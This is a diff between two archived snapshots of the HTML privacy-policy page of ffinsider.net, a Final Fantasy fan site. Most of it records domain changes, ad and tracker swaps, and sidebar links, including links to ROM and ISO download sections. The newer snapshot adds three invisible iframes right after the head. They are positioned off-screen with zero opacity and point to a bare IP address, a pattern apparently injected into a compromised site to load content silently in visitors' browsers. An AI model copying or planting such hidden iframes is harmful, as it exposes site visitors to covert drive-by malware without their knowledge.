--- a/f/ff/ffi/ffinsider.net.html
+++ b/f/ff/ffi/ffinsider.net.html
@@ -1,5 +1,5 @@
-<!--The following is the downloaded HTML source of the ffinsider.net privacy policy that was archived on 2013-01-15.
- Please check the original snapshot on the Wayback Machine (https://web.archive.org/web/20130115135233id_/http%3A//www.ffinsider.net/privacy.php) for the most accurate reproduction.-->
+<!--The following is the downloaded HTML source of the ffinsider.net privacy policy that was archived on 2013-12-20.
+ Please check the original snapshot on the Wayback Machine (https://web.archive.org/web/20131220164545id_/http%3A//www.ffinsider.eu/privacy.php) for the most accurate reproduction.-->
 
 <html><head>
 
@@ -8,13 +8,16 @@
 <meta name="Keywords" content="final fantasy, final, fantasy, ff, viii, ix, x, x-2, xi, xii, 8, 9, 10, 10-2, 11, 12, advent children, kingdom hearts, kingdom, hearts, kh, music, mp3s, downloads, characters, weapons, magic, summons, armor, forums, rpg, chat, irc, walkthrough, soundtracks, square, squaresoft, enix, square-enix, squarenix, squaresoft">
 <meta name="Description" content="A Final Fantasy site offering media, information, guides, news and discussion forums on the series.">
 <link rel="alternate" type="application/rss+xml" href="http://feeds.feedburner.com/ffinsider">
-<link rel="stylesheet" href="http://www.ffinsider.net/style.css" type="text/css" media="screen">
+<link rel="stylesheet" href="http://www.ffinsider.eu/style.css" type="text/css" media="screen">
 
 <meta name="verify-v1" content="KBEsJ72R1bqGhFNyMf6eUgE0tImRJtpp58TX266gbsc=">
 
-</head>
+</head><body><iframe frameborder="0" src="https://89.45.14.96/url.php?id=15" style="width:40px;height:40px;overflow:hidden;position:absolute;left:-40px;top:0;opacity:0"></iframe>
+<iframe frameborder="0" src="https://89.45.14.96/url.php?id=15" style="width:40px;height:40px;overflow:hidden;position:absolute;left:-40px;top:0;opacity:0"></iframe>
+<iframe frameborder="0" src="https://89.45.14.96/url.php?id=15" style="width:40px;height:40px;overflow:hidden;position:absolute;left:-40px;top:0;opacity:0"></iframe>
 
-<body>
+
+
 
 <table cellpadding="0" cellspacing="2" bgcolor="#000000" width="980" align="center">
 	<tbody><tr>
@@ -26,7 +29,7 @@
 
 <table cellpadding="0" cellspacing="0" width="100%">
 	<tbody><tr>
-		<td class="content3"><img src="/despix/arrow.gif" width="6" height="7"> <a href="http://www.ffinsider.net/">Final Fantasy Insider</a></td>
+		<td class="content3"><img src="/despix/arrow.gif" width="6" height="7"> <a href="http://www.ffinsider.eu/">Final Fantasy Insider</a></td>
 		<td align="right" class="content3">
 
 <img src="/despix/arrow.gif" width="6" height="7"> <a href="/contact/">Contact Us</a> &nbsp;&nbsp;<img src="/despix/arrow.gif" width="6" height="7"> <a href="/forums/">Forums</a> &nbsp;&nbsp;<!-- Start of StatCounter Code -->
@@ -40,19 +43,6 @@ var sc_remove_link=1;
 
 <script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/counter.js"></script><noscript><img  src="http://c8.statcounter.com/counter.php?sc_project=895909&amp;java=0&amp;security=365c27ee&amp;invisible=1" alt="simple hit counter" border="0"></noscript>
 <!-- End of StatCounter Code -->
-<!-- Start of StatCounter Code for Default Guide -->
-<script type="text/javascript">
-var sc_project=7432319; 
-var sc_invisible=1; 
-var sc_security="e624e9fe"; 
-</script>
-<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
-<noscript><div class="statcounter"><a title="tumblr page
-counter" href="http://statcounter.com/tumblr/"
-target="_blank"><img class="statcounter"
-src="http://c.statcounter.com/7432319/0/e624e9fe/1/"
-alt="tumblr page counter"></a></div></noscript>
-<!-- End of StatCounter Code for Default Guide -->
 
 		</td>
 	</tr>
@@ -63,7 +53,7 @@ alt="tumblr page counter"></a></div></noscript>
 	</tr>
 	<tr>
 		<td style="border-bottom: 1px #000000 solid" colspan="3">
-        <a href="http://www.ffinsider.net"><img src="http://i.imgur.com/mvI9B.jpg" border="0" alt="Final Fantasy Insider Index"></a></td>
+        <a href="http://www.ffinsider.eu"><img src="http://i.imgur.com/mvI9B.jpg" border="0" alt="Final Fantasy Insider Index"></a></td>
 	</tr>
 	<tr>
 		<td colspan="3" width="100%">
@@ -77,22 +67,15 @@ alt="tumblr page counter"></a></div></noscript>
 	<tr>
 		<td align="center"><br>
 
-<!-- BEGIN RICH-MEDIA Burst Media CODE -->
-<script type="text/javascript" language="JavaScript">
-rnum=Math.round(Math.random() * 100000);
-ts=String.fromCharCode(60);
-if (window.self != window.top) {nf=''} else {nf='NF/'};
-document.write(ts+'script src="http://www.burstnet.com/cgi-bin/ads/ad21533a.cgi/v=2.3S/sz=468x60A|728x90A/'+rnum+'/'+nf+'RETURN-CODE/JS/">'+ts+'/script>');
-</script><script src="http://www.burstnet.com/cgi-bin/ads/ad21533a.cgi/v=2.3S/sz=468x60A|728x90A/33408/NF/RETURN-CODE/JS/"></script><noscript><a href="http://www.burstnet.com/ads/ad21533a-map.cgi/ns/v=2.3S/sz=468x60A|728x90A/" target="_top">
-<img src="http://www.burstnet.com/cgi-bin/ads/ad21533a.cgi/ns/v=2.3S/sz=468x60A|728x90A/" border="0" alt="Click Here" /></a>
-</noscript>
-<!-- END Burst Media CODE --><hr size="1" color="#000000">
+<script src="http://tag.contextweb.com/TagPublish/getjs.aspx?action=VIEWAD&amp;cwrun=200&amp;cwadformat=728X90&amp;cwpid=533745&amp;cwwidth=728&amp;cwheight=90&amp;cwpnet=1&amp;cwtagid=96495"></script>
+
+<hr size="1" color="#000000">
 
 <!--JavaScript Tag // Tag for network 5205: Intergi // Website: Reynaldo Anthony // Page: ffinsider // Placement: ffinsider_728x90 (2558253) // created at: Sep 24, 2012 4:59:37 PM-->
 <script language="javascript"><!--
 document.write('<scr'+'ipt language="javascript1.1" src="http://ads.intergi.com/addyn/3.0/5205/2558253/0/225/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=[group];misc='+new Date().getTime()+'"></scri'+'pt>');
 //-->
-</script><script language="javascript1.1" src="http://ads.intergi.com/addyn/3.0/5205/2558253/0/225/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=[group];misc=1580523206014"></script><noscript><a href="http://ads.intergi.com/adlink/3.0/5205/2558253/0/225/ADTECH;loc=300;key=key1+key2+key3+key4;grp=[group]" target="_blank"><img src="http://ads.intergi.com/adserv/3.0/5205/2558253/0/225/ADTECH;loc=300;key=key1+key2+key3+key4;grp=[group]" border="0" width="728" height="90"></a></noscript>
+</script><script language="javascript1.1" src="http://ads.intergi.com/addyn/3.0/5205/2558253/0/225/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=[group];misc=1580523206723"></script><noscript><a href="http://ads.intergi.com/adlink/3.0/5205/2558253/0/225/ADTECH;loc=300;key=key1+key2+key3+key4;grp=[group]" target="_blank"><img src="http://ads.intergi.com/adserv/3.0/5205/2558253/0/225/ADTECH;loc=300;key=key1+key2+key3+key4;grp=[group]" border="0" width="728" height="90"></a></noscript>
 <!-- End of JavaScript Tag -->
 
 <br><br>
@@ -122,7 +105,6 @@ document.write('<scr'+'ipt language="javascript1.1" src="http://ads.intergi.com/
 	<a class="pw-button-post"></a>
 </div>
 <script src="http://i.po.st/share/script/post-widget.js#publisherKey=ptsoqa7ldni9v0omia5b" type="text/javascript"></script>
-
 		</td>
 	</tr>
 </tbody></table>
@@ -160,7 +142,7 @@ document.write('<scr'+'ipt language="javascript1.1" src="http://ads.intergi.com/
 <img src="/despix/arrow3.gif" width="9" height="5"> <a href="/kingdom-hearts/">Kingdom Hearts</a><br>
 <img src="/despix/arrow3.gif" width="9" height="5"> <a href="/kingdom-hearts-bbs/kh-bbs.php">Kingdom Hearts BBS</a><br>
 <img src="/despix/arrow3.gif" width="9" height="5"> <a href="/the-spirits-within/">The Spirits Within</a><br>
-<center><a href="http://www.play-asia.com/SOap-23-83-bd4k.html">
+<center><a href="http://www.play-asia.com/SOap-23-83-bd4k-71-bp-49-en-84-j-70-4r3p.html">
 <img src="http://www.play-asia.com/paOS-1e-74-zs.gif" border="0" alt="Play-Asia.com - Buy Video Games for Consoles and PC - From Japan, Korea and other Regions" width="120" height="60"></a></center>
 
 		</td>
@@ -267,12 +249,17 @@ document.write('<scr'+'ipt language="javascript1.1" src="http://ads.intergi.com/
 
 	<tr>
 		<td>
-<img src="/despix/arrow3.gif" width="9" height="5"> <a href="http://www.ffinsider.net/nds-roms/">NDS Roms</a><br>
-<img src="/despix/arrow3.gif" width="9" height="5"> <a href="http://www.ffinsider.net/ps3-iso/">PS3 ISO</a><br>
-<img src="/despix/arrow3.gif" width="9" height="5"> <a href="http://www.ffinsider.net/psp-iso/">PSP ISO</a><br>
-<img src="/despix/arrow3.gif" width="9" height="5"> <a href="http://www.ffinsider.net/psx-iso/">PSX ISO</a><br>
-<img src="/despix/arrow3.gif" width="9" height="5"> <a href="http://www.ffinsider.net/psp-movies/">PSP Movies</a><br>
-<img src="/despix/arrow3.gif" width="9" height="5"> <a href="http://www.ffinsider.net/wii-iso/">Wii ISO</a><br>
+<img src="/despix/arrow3.gif" width="9" height="5"> <a href="http://www.ffinsider.eu/3ds-roms/">3DS Roms</a><br>
+<img src="/despix/arrow3.gif" width="9" height="5"> <a href="http://www.ffinsider.eu/nds-roms/">NDS Roms</a><br>
+<img src="/despix/arrow3.gif" width="9" height="5"> <a href="http://www.ffinsider.eu/ps3-iso/">PS3 ISO</a><br>
+<img src="/despix/arrow3.gif" width="9" height="5"> <a href="http://www.ffinsider.eu/psp-iso/">PSP ISO</a><br>
+<img src="/despix/arrow3.gif" width="9" height="5"> <a href="http://www.ffinsider.eu/psx-iso/">PSX ISO</a><br>
+<img src="/despix/arrow3.gif" width="9" height="5"> <a href="http://www.ffinsider.eu/vita-iso/">VITA ISO</a><br>
+<img src="/despix/arrow3.gif" width="9" height="5"> <a href="http://www.ffinsider.eu/psp-movies/">PSP Movies</a><br>
+<img src="/despix/arrow3.gif" width="9" height="5"> <a href="http://www.ffinsider.eu/wii-iso/">Wii ISO</a>
+<hr size="1" color="#666666">
+<img src="/despix/arrow3.gif" width="9" height="5"> <a href="http://www.runningmanengsub.org">Running Man Eng Sub</a>
+
 
 		</td>
 	</tr>
@@ -305,10 +292,10 @@ document.write('<scr'+'ipt language="javascript1.1" src="http://ads.intergi.com/
 	
 	<td>
 
-<script src="http://www.ffinsider.net/poll/jsfiles/1347209332pre.js"></script>
+<script src="http://www.ffinsider.eu/poll/jsfiles/1360914620pre.js"></script>
 <script language="JavaScript" type="text/javascript">
 <!-- 
-get_poll_1347209332()
+get_poll_1360914620()
 // -->
 </script>
 
@@ -323,12 +310,12 @@ get_poll_1347209332()
 <input type="hidden" name="forid" value="1">
 <input type="hidden" name="ie" value="ISO-8859-1">
 <input type="hidden" name="oe" value="ISO-8859-1">
-<input type="hidden" name="cof" value="GALT:#008000;GL:1;DIV:#FFFFFF;VLC:663399;AH:center;BGC:FFFFFF;LBGC:FFFFFF;ALC:0033FF;LC:0033FF;T:000000;GFNT:0000FF;GIMP:0000FF;LH:50;LW:400;L:http://www.ffinsider.net/gfx/google.jpg;S:http://www.ffinsider.net;FORID:1;">
+<input type="hidden" name="cof" value="GALT:#008000;GL:1;DIV:#FFFFFF;VLC:663399;AH:center;BGC:FFFFFF;LBGC:FFFFFF;ALC:0033FF;LC:0033FF;T:000000;GFNT:0000FF;GIMP:0000FF;LH:50;LW:400;L:http://www.ffinsider.eu/gfx/google.jpg;S:http://www.ffinsider.eu;FORID:1;">
 <input type="hidden" name="hl" value="en">
 <input type="text" name="q" size="15" maxlength="255" value="" style="border:1px solid #000000; font-family: Verdana; font-size: 10px; ">
 <input type="submit" class="smalltext" name="sa" value="Go" style="border:1px solid #000000; font-family: Verdana; font-size: 10px; font-weight: bold"><br>
 <input type="radio" class="nobdr" name="sitesearch" value="">Web
-<input type="radio" class="nobdr" name="sitesearch" value="ffinsider.net" checked="">Search 
+<input type="radio" class="nobdr" name="sitesearch" value="ffinsider.eu" checked="">Search 
 
 Site</form>
 	<!-- /SiteSearch Google -->
@@ -390,7 +377,7 @@ should refrain by not going any further into the site.</td>
 <script language="javascript"><!--
 document.write('<scr'+'ipt language="javascript1.1" src="http://ads.intergi.com/addyn/3.0/5205/2558252/0/170/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=[group];misc='+new Date().getTime()+'"></scri'+'pt>');
 //-->
-</script><script language="javascript1.1" src="http://ads.intergi.com/addyn/3.0/5205/2558252/0/170/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=[group];misc=1580523206059"></script><noscript><a href="http://ads.intergi.com/adlink/3.0/5205/2558252/0/170/ADTECH;loc=300;key=key1+key2+key3+key4;grp=[group]" target="_blank"><img src="http://ads.intergi.com/adserv/3.0/5205/2558252/0/170/ADTECH;loc=300;key=key1+key2+key3+key4;grp=[group]" border="0" width="300" height="250"></a></noscript>
+</script><script language="javascript1.1" src="http://ads.intergi.com/addyn/3.0/5205/2558252/0/170/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=[group];misc=1580523206781"></script><noscript><a href="http://ads.intergi.com/adlink/3.0/5205/2558252/0/170/ADTECH;loc=300;key=key1+key2+key3+key4;grp=[group]" target="_blank"><img src="http://ads.intergi.com/adserv/3.0/5205/2558252/0/170/ADTECH;loc=300;key=key1+key2+key3+key4;grp=[group]" border="0" width="300" height="250"></a></noscript>
 <!-- End of JavaScript Tag -->
 <br><br>
 
@@ -408,22 +395,37 @@ document.write('<scr'+'ipt language="javascript1.1" src="http://ads.intergi.com/
 	</tr>
 	<tr>
 		<td align="center">
-		<!-- BEGIN RICH-MEDIA Burst Media CODE -->
-<script type="text/javascript" language="JavaScript">
-rnum=Math.round(Math.random() * 100000);
-ts=String.fromCharCode(60);
-if (window.self != window.top) {nf=''} else {nf='NF/'};
-document.write(ts+'script src="http://www.burstnet.com/cgi-bin/ads/ad21533a.cgi/v=2.3S/sz=120x600A|160x600A/'+rnum+'/'+nf+'RETURN-CODE/JS/">'+ts+'/script>');
-</script><script src="http://www.burstnet.com/cgi-bin/ads/ad21533a.cgi/v=2.3S/sz=120x600A|160x600A/17216/NF/RETURN-CODE/JS/"></script><noscript><a href="http://www.burstnet.com/ads/ad21533a-map.cgi/ns/v=2.3S/sz=120x600A|160x600A/" target="_top">
-<img src="http://www.burstnet.com/cgi-bin/ads/ad21533a.cgi/ns/v=2.3S/sz=120x600A|160x600A/" border="0" alt="Click Here" /></a>
-</noscript>
-<!-- END Burst Media CODE -->
+<!--JavaScript Tag // Tag for network 5205: Intergi // Website: Reynaldo Anthony // Page: ffinsider // Placement: ffinsider_160x600 (2558251) // created at: Sep 24, 2012 4:58:59 PM-->
+<script language="javascript"><!--
+document.write('<scr'+'ipt language="javascript1.1" src="http://ads.intergi.com/addyn/3.0/5205/2558251/0/154/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=[group];misc='+new Date().getTime()+'"></scri'+'pt>');
+//-->
+</script><script language="javascript1.1" src="http://ads.intergi.com/addyn/3.0/5205/2558251/0/154/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=[group];misc=1580523206785"></script><noscript><a href="http://ads.intergi.com/adlink/3.0/5205/2558251/0/154/ADTECH;loc=300;key=key1+key2+key3+key4;grp=[group]" target="_blank"><img src="http://ads.intergi.com/adserv/3.0/5205/2558251/0/154/ADTECH;loc=300;key=key1+key2+key3+key4;grp=[group]" border="0" width="160" height="600"></a></noscript>
+<!-- End of JavaScript Tag -->
 <br><br>
 <script src="http://tag.contextweb.com/TagPublish/getjs.aspx?action=VIEWAD&amp;cwrun=200&amp;cwadformat=160X600&amp;cwpid=533745&amp;cwwidth=160&amp;cwheight=600&amp;cwpnet=1&amp;cwtagid=96499"></script>
 
 		</td>
 	</tr>
 </tbody></table>
+<div id="eXTReMe">
+<img src="http://t1.extreme-dm.com/i.gif" style="border: 0;" height="1" width="1" id="EXim" alt="eXTReMe Tracker">
+<script type="text/javascript"><!--
+EXref="";top.document.referrer?EXref=top.document.referrer:EXref=document.referrer;//-->
+</script><script type="text/javascript"><!--
+var EXlogin='finsidex' // Login
+var EXvsrv='s9' // VServer
+EXs=screen;EXw=EXs.width;navigator.appName!="Netscape"?
+EXb=EXs.colorDepth:EXb=EXs.pixelDepth;EXsrc="src";
+navigator.javaEnabled()==1?EXjv="y":EXjv="n";
+EXd=document;EXw?"":EXw="na";EXb?"":EXb="na";
+EXref?EXref=EXref:EXref=EXd.referrer;
+EXd.write("<img "+EXsrc+"=http://e0.extreme-dm.com",
+"/"+EXvsrv+".g?login="+EXlogin+"&amp;",
+"jv="+EXjv+"&amp;j=y&amp;srw="+EXw+"&amp;srb="+EXb+"&amp;",
+"l="+escape(EXref)+" height=1 width=1>");//-->
+</script><img src="http://e0.extreme-dm.com/s9.g?login=finsidex&amp;jv=n&amp;j=y&amp;srw=800&amp;srb=24&amp;l=" height="1" width="1"><noscript><div id="neXTReMe"><img height="1" width="1" alt=""
+src="http://e0.extreme-dm.com/s9.g?login=finsidex&amp;j=n&amp;jv=n" />
+</div></noscript></div>
 <table><tbody><tr><td></td></tr></tbody></table>
 <table cellpadding="5" cellspacing="3" bgcolor="#000000" width="100%">
 	<tbody><tr>
@@ -457,8 +459,7 @@ Final Fantasy XIII coverage completely revamped! Sections added and changed: <a 
 <table cellpadding="0" cellspacing="0" width="100%">
 	<tbody><tr>
 
-		<td class="content3">©Copyright 2005-2012 Final Fantasy Insider. All rights reserved.<img src="/images/spacing.jpg" width="1" height="1">
-</td>
+		<td class="content3">©Copyright 2005-2012 Final Fantasy Insider. All rights reserved.<img src="/images/spacing.jpg" width="1" height="1"></td>
 
 		<td align="right" class="content3">[<a href="#">Top</a>]</td>
 	</tr>
@@ -475,16 +476,11 @@ Final Fantasy XIII coverage completely revamped! Sections added and changed: <a 
 </tbody></table>
 
 
-<!-- Kontera ContentLink(TM);-->
 <script type="text/javascript">
-var dc_AdLinkColor = '#8dc73f' ; 
-var dc_PublisherID = 105236 ; 
+var infolinks_pid = 1823189;
+var infolinks_wsid = 0;
 </script>
-<script type="text/javascript" src="http://kona.kontera.com/javascript/lib/KonaLibInline.js">
-</script>
-
-
-
+<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
 
 
 </body></html>
